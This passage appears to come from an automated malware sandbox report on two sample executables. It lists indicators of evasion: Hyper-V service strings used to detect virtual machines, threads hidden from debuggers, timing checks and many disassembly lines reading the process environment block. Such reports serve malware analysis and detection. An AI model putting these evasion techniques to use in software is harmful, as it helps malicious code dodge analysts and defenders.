Source: Zr26f1rL6r.exe, 00000002.00000002.47313677308.0000000003289000.00000004.00000001.sdmp, Zr26f1rL6r.exe, 0000000A.00000002.47941584384.00000000025B9000.00000004.00000001.sdmp, c8ahotgz8h.exe, 00000016.00000002.51082515564.0000000003279000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001A.00000002.51210974523.0000000003279000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001B.00000002.51292888312.0000000003269000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001C.00000002.51537553719.0000000002629000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001D.00000002.51664137281.0000000002499000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001E.00000002.51743441994.0000000002559000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Data Exchange Service
Source: explorer.exe, 0000000E.00000000.47877168581.000000000D21C000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47779130675.000000000D21C000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.48061967346.000000000D21C000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47825346643.000000000D21C000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW@
Source: Zr26f1rL6r.exe, 00000002.00000002.47313677308.0000000003289000.00000004.00000001.sdmp, Zr26f1rL6r.exe, 0000000A.00000002.47941584384.00000000025B9000.00000004.00000001.sdmp, c8ahotgz8h.exe, 00000016.00000002.51082515564.0000000003279000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001A.00000002.51210974523.0000000003279000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001B.00000002.51292888312.0000000003269000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001C.00000002.51537553719.0000000002629000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001D.00000002.51664137281.0000000002499000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001E.00000002.51743441994.0000000002559000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Guest Service Interface
Source: c8ahotgz8h.exe, 0000001E.00000002.51743441994.0000000002559000.00000004.00000001.sdmp	Binary or memory string: vmicheartbeat

Anti Debugging:

Hides threads from debuggers

Show sources

Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Thread information set: HideFromDebugger

Source: C:\Users\user\Desktop\Zr26f1rL6r.exe

Code function: 2_2_0232045A rdtsc

2_2_0232045A

Source: C:\Users\user\Desktop\Zr26f1rL6r.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 2_2_0231F3CA mov eax, dword ptr fs:[00000030h]	2_2_0231F3CA
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 2_2_02321490 mov eax, dword ptr fs:[00000030h]	2_2_02321490
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 2_2_0231FCC1 mov eax, dword ptr fs:[00000030h]	2_2_0231FCC1
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8EAE89 mov eax, dword ptr fs:[00000030h]	10_2_1E8EAE89
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8EAE89 mov eax, dword ptr fs:[00000030h]	10_2_1E8EAE89
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8EBE80 mov eax, dword ptr fs:[00000030h]	10_2_1E8EBE80
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8FCEA0 mov eax, dword ptr fs:[00000030h]	10_2_1E8FCEA0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E980EAD mov eax, dword ptr fs:[00000030h]	10_2_1E980EAD
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E980EAD mov eax, dword ptr fs:[00000030h]	10_2_1E980EAD
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8F2EB8 mov eax, dword ptr fs:[00000030h]	10_2_1E8F2EB8
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8F2EB8 mov eax, dword ptr fs:[00000030h]	10_2_1E8F2EB8
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8D1EB2 mov ecx, dword ptr fs:[00000030h]	10_2_1E8D1EB2
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8D1EB2 mov ecx, dword ptr fs:[00000030h]	10_2_1E8D1EB2
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8D1EB2 mov eax, dword ptr fs:[00000030h]	10_2_1E8D1EB2
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8D1EB2 mov ecx, dword ptr fs:[00000030h]	10_2_1E8D1EB2
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8D1EB2 mov ecx, dword ptr fs:[00000030h]	10_2_1E8D1EB2
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8D1EB2 mov eax, dword ptr fs:[00000030h]	10_2_1E8D1EB2
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8D1EB2 mov ecx, dword ptr fs:[00000030h]	10_2_1E8D1EB2
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8D1EB2 mov ecx, dword ptr fs:[00000030h]	10_2_1E8D1EB2
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8D1EB2 mov eax, dword ptr fs:[00000030h]	10_2_1E8D1EB2
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8D1EB2 mov ecx, dword ptr fs:[00000030h]	10_2_1E8D1EB2
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8D1EB2 mov ecx, dword ptr fs:[00000030h]	10_2_1E8D1EB2
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8D1EB2 mov eax, dword ptr fs:[00000030h]	10_2_1E8D1EB2
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E94CED0 mov ecx, dword ptr fs:[00000030h]	10_2_1E94CED0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E901ED8 mov eax, dword ptr fs:[00000030h]	10_2_1E901ED8
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E989ED2 mov eax, dword ptr fs:[00000030h]	10_2_1E989ED2
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E947EC3 mov eax, dword ptr fs:[00000030h]	10_2_1E947EC3
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E947EC3 mov ecx, dword ptr fs:[00000030h]	10_2_1E947EC3
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E994EC1 mov eax, dword ptr fs:[00000030h]	10_2_1E994EC1
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8FBED0 mov eax, dword ptr fs:[00000030h]	10_2_1E8FBED0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8F1EED mov eax, dword ptr fs:[00000030h]	10_2_1E8F1EED
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8F1EED mov eax, dword ptr fs:[00000030h]	10_2_1E8F1EED
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8F1EED mov eax, dword ptr fs:[00000030h]	10_2_1E8F1EED
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8C2EE8 mov eax, dword ptr fs:[00000030h]	10_2_1E8C2EE8
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8C2EE8 mov eax, dword ptr fs:[00000030h]	10_2_1E8C2EE8
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8C2EE8 mov eax, dword ptr fs:[00000030h]	10_2_1E8C2EE8
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8C2EE8 mov eax, dword ptr fs:[00000030h]	10_2_1E8C2EE8
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E963EFC mov eax, dword ptr fs:[00000030h]	10_2_1E963EFC
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8C3EE2 mov eax, dword ptr fs:[00000030h]	10_2_1E8C3EE2
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E97EEE7 mov eax, dword ptr fs:[00000030h]	10_2_1E97EEE7
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8BCEF0 mov eax, dword ptr fs:[00000030h]	10_2_1E8BCEF0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8BCEF0 mov eax, dword ptr fs:[00000030h]	10_2_1E8BCEF0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8BCEF0 mov eax, dword ptr fs:[00000030h]	10_2_1E8BCEF0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8BCEF0 mov eax, dword ptr fs:[00000030h]	10_2_1E8BCEF0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8BCEF0 mov eax, dword ptr fs:[00000030h]	10_2_1E8BCEF0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8BCEF0 mov eax, dword ptr fs:[00000030h]	10_2_1E8BCEF0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E93FE1F mov eax, dword ptr fs:[00000030h]	10_2_1E93FE1F
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E93FE1F mov eax, dword ptr fs:[00000030h]	10_2_1E93FE1F
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E93FE1F mov eax, dword ptr fs:[00000030h]	10_2_1E93FE1F
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E93FE1F mov eax, dword ptr fs:[00000030h]	10_2_1E93FE1F
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8C6E00 mov eax, dword ptr fs:[00000030h]	10_2_1E8C6E00
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8C6E00 mov eax, dword ptr fs:[00000030h]	10_2_1E8C6E00
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8C6E00 mov eax, dword ptr fs:[00000030h]	10_2_1E8C6E00
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8C6E00 mov eax, dword ptr fs:[00000030h]	10_2_1E8C6E00
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8C3E01 mov eax, dword ptr fs:[00000030h]	10_2_1E8C3E01
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8BBE18 mov ecx, dword ptr fs:[00000030h]	10_2_1E8BBE18
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8C3E14 mov eax, dword ptr fs:[00000030h]	10_2_1E8C3E14
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8C3E14 mov eax, dword ptr fs:[00000030h]	10_2_1E8C3E14
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8C3E14 mov eax, dword ptr fs:[00000030h]	10_2_1E8C3E14
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8F8E15 mov eax, dword ptr fs:[00000030h]	10_2_1E8F8E15
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E994E03 mov eax, dword ptr fs:[00000030h]	10_2_1E994E03
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E956E30 mov eax, dword ptr fs:[00000030h]	10_2_1E956E30
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E956E30 mov eax, dword ptr fs:[00000030h]	10_2_1E956E30
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E955E30 mov eax, dword ptr fs:[00000030h]	10_2_1E955E30
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E955E30 mov ecx, dword ptr fs:[00000030h]	10_2_1E955E30
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E955E30 mov eax, dword ptr fs:[00000030h]	10_2_1E955E30
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E955E30 mov eax, dword ptr fs:[00000030h]	10_2_1E955E30
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E955E30 mov eax, dword ptr fs:[00000030h]	10_2_1E955E30
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E955E30 mov eax, dword ptr fs:[00000030h]	10_2_1E955E30
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8FCE3F mov eax, dword ptr fs:[00000030h]	10_2_1E8FCE3F
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8C2E32 mov eax, dword ptr fs:[00000030h]	10_2_1E8C2E32
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E988E26 mov eax, dword ptr fs:[00000030h]	10_2_1E988E26
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E988E26 mov eax, dword ptr fs:[00000030h]	10_2_1E988E26
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E988E26 mov eax, dword ptr fs:[00000030h]	10_2_1E988E26
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E988E26 mov eax, dword ptr fs:[00000030h]	10_2_1E988E26
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E93DE50 mov eax, dword ptr fs:[00000030h]	10_2_1E93DE50
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E93DE50 mov eax, dword ptr fs:[00000030h]	10_2_1E93DE50
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E93DE50 mov ecx, dword ptr fs:[00000030h]	10_2_1E93DE50
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E93DE50 mov eax, dword ptr fs:[00000030h]	10_2_1E93DE50
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E93DE50 mov eax, dword ptr fs:[00000030h]	10_2_1E93DE50
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8EEE48 mov eax, dword ptr fs:[00000030h]	10_2_1E8EEE48
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8BFE40 mov eax, dword ptr fs:[00000030h]	10_2_1E8BFE40
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8BAE40 mov eax, dword ptr fs:[00000030h]	10_2_1E8BAE40
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8BAE40 mov eax, dword ptr fs:[00000030h]	10_2_1E8BAE40
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8BAE40 mov eax, dword ptr fs:[00000030h]	10_2_1E8BAE40
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8BDE45 mov eax, dword ptr fs:[00000030h]	10_2_1E8BDE45
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8BDE45 mov ecx, dword ptr fs:[00000030h]	10_2_1E8BDE45
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8BBE60 mov eax, dword ptr fs:[00000030h]	10_2_1E8BBE60
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8BBE60 mov eax, dword ptr fs:[00000030h]	10_2_1E8BBE60
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E97EE78 mov eax, dword ptr fs:[00000030h]	10_2_1E97EE78
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E970E6D mov eax, dword ptr fs:[00000030h]	10_2_1E970E6D
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E970E6D mov eax, dword ptr fs:[00000030h]	10_2_1E970E6D
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E970E6D mov eax, dword ptr fs:[00000030h]	10_2_1E970E6D
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E970E6D mov eax, dword ptr fs:[00000030h]	10_2_1E970E6D
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E970E6D mov eax, dword ptr fs:[00000030h]	10_2_1E970E6D
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E970E6D mov eax, dword ptr fs:[00000030h]	10_2_1E970E6D
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E970E6D mov eax, dword ptr fs:[00000030h]	10_2_1E970E6D
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E970E6D mov eax, dword ptr fs:[00000030h]	10_2_1E970E6D
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E970E6D mov eax, dword ptr fs:[00000030h]	10_2_1E970E6D
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E970E6D mov eax, dword ptr fs:[00000030h]	10_2_1E970E6D
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E970E6D mov eax, dword ptr fs:[00000030h]	10_2_1E970E6D
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E970E6D mov eax, dword ptr fs:[00000030h]	10_2_1E970E6D
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E970E6D mov eax, dword ptr fs:[00000030h]	10_2_1E970E6D
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E970E6D mov eax, dword ptr fs:[00000030h]	10_2_1E970E6D
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E994E62 mov eax, dword ptr fs:[00000030h]	10_2_1E994E62
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8C1E70 mov eax, dword ptr fs:[00000030h]	10_2_1E8C1E70
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8F7E71 mov eax, dword ptr fs:[00000030h]	10_2_1E8F7E71
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8FCE70 mov eax, dword ptr fs:[00000030h]	10_2_1E8FCE70
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8D0F90 mov eax, dword ptr fs:[00000030h]	10_2_1E8D0F90
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8D0F90 mov ecx, dword ptr fs:[00000030h]	10_2_1E8D0F90
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8D0F90 mov eax, dword ptr fs:[00000030h]	10_2_1E8D0F90
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8D0F90 mov eax, dword ptr fs:[00000030h]	10_2_1E8D0F90
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8D0F90 mov eax, dword ptr fs:[00000030h]	10_2_1E8D0F90
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8D0F90 mov eax, dword ptr fs:[00000030h]	10_2_1E8D0F90
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8D0F90 mov eax, dword ptr fs:[00000030h]	10_2_1E8D0F90
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8D0F90 mov eax, dword ptr fs:[00000030h]	10_2_1E8D0F90
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8D0F90 mov eax, dword ptr fs:[00000030h]	10_2_1E8D0F90
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8D0F90 mov eax, dword ptr fs:[00000030h]	10_2_1E8D0F90
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8D0F90 mov eax, dword ptr fs:[00000030h]	10_2_1E8D0F90
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8D0F90 mov eax, dword ptr fs:[00000030h]	10_2_1E8D0F90
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8D0F90 mov eax, dword ptr fs:[00000030h]	10_2_1E8D0F90
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8EBF93 mov eax, dword ptr fs:[00000030h]	10_2_1E8EBF93
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E948F8B mov eax, dword ptr fs:[00000030h]	10_2_1E948F8B
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E948F8B mov eax, dword ptr fs:[00000030h]	10_2_1E948F8B
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E948F8B mov eax, dword ptr fs:[00000030h]	10_2_1E948F8B
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8C1FAA mov eax, dword ptr fs:[00000030h]	10_2_1E8C1FAA
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8F8FBC mov eax, dword ptr fs:[00000030h]	10_2_1E8F8FBC
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8C4FB6 mov eax, dword ptr fs:[00000030h]	10_2_1E8C4FB6
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8ECFB0 mov eax, dword ptr fs:[00000030h]	10_2_1E8ECFB0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8ECFB0 mov eax, dword ptr fs:[00000030h]	10_2_1E8ECFB0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E97EFD3 mov eax, dword ptr fs:[00000030h]	10_2_1E97EFD3
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E93FFDC mov eax, dword ptr fs:[00000030h]	10_2_1E93FFDC
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E93FFDC mov eax, dword ptr fs:[00000030h]	10_2_1E93FFDC
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E93FFDC mov eax, dword ptr fs:[00000030h]	10_2_1E93FFDC
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E93FFDC mov ecx, dword ptr fs:[00000030h]	10_2_1E93FFDC
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E93FFDC mov eax, dword ptr fs:[00000030h]	10_2_1E93FFDC
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E93FFDC mov eax, dword ptr fs:[00000030h]	10_2_1E93FFDC
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8B9FD0 mov eax, dword ptr fs:[00000030h]	10_2_1E8B9FD0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E941FC9 mov eax, dword ptr fs:[00000030h]	10_2_1E941FC9
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E941FC9 mov eax, dword ptr fs:[00000030h]	10_2_1E941FC9
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E941FC9 mov eax, dword ptr fs:[00000030h]	10_2_1E941FC9
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E941FC9 mov eax, dword ptr fs:[00000030h]	10_2_1E941FC9
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E941FC9 mov eax, dword ptr fs:[00000030h]	10_2_1E941FC9
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E941FC9 mov eax, dword ptr fs:[00000030h]	10_2_1E941FC9
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E941FC9 mov eax, dword ptr fs:[00000030h]	10_2_1E941FC9
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E941FC9 mov eax, dword ptr fs:[00000030h]	10_2_1E941FC9
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E941FC9 mov eax, dword ptr fs:[00000030h]	10_2_1E941FC9
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E941FC9 mov eax, dword ptr fs:[00000030h]	10_2_1E941FC9
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E941FC9 mov eax, dword ptr fs:[00000030h]	10_2_1E941FC9
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E941FC9 mov eax, dword ptr fs:[00000030h]	10_2_1E941FC9
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E941FC9 mov eax, dword ptr fs:[00000030h]	10_2_1E941FC9
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E941FC9 mov eax, dword ptr fs:[00000030h]	10_2_1E941FC9
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E941FC9 mov eax, dword ptr fs:[00000030h]	10_2_1E941FC9
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E994FFF mov eax, dword ptr fs:[00000030h]	10_2_1E994FFF
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8D6FE0 mov eax, dword ptr fs:[00000030h]	10_2_1E8D6FE0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8D6FE0 mov ecx, dword ptr fs:[00000030h]	10_2_1E8D6FE0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8D6FE0 mov ecx, dword ptr fs:[00000030h]	10_2_1E8D6FE0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8D6FE0 mov eax, dword ptr fs:[00000030h]	10_2_1E8D6FE0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8D6FE0 mov ecx, dword ptr fs:[00000030h]	10_2_1E8D6FE0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8D6FE0 mov ecx, dword ptr fs:[00000030h]	10_2_1E8D6FE0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8D6FE0 mov eax, dword ptr fs:[00000030h]	10_2_1E8D6FE0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8D6FE0 mov eax, dword ptr fs:[00000030h]	10_2_1E8D6FE0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8D6FE0 mov eax, dword ptr fs:[00000030h]	10_2_1E8D6FE0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8D6FE0 mov eax, dword ptr fs:[00000030h]	10_2_1E8D6FE0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8D6FE0 mov eax, dword ptr fs:[00000030h]	10_2_1E8D6FE0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8D6FE0 mov eax, dword ptr fs:[00000030h]	10_2_1E8D6FE0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8D6FE0 mov eax, dword ptr fs:[00000030h]	10_2_1E8D6FE0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8D6FE0 mov eax, dword ptr fs:[00000030h]	10_2_1E8D6FE0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8D6FE0 mov eax, dword ptr fs:[00000030h]	10_2_1E8D6FE0
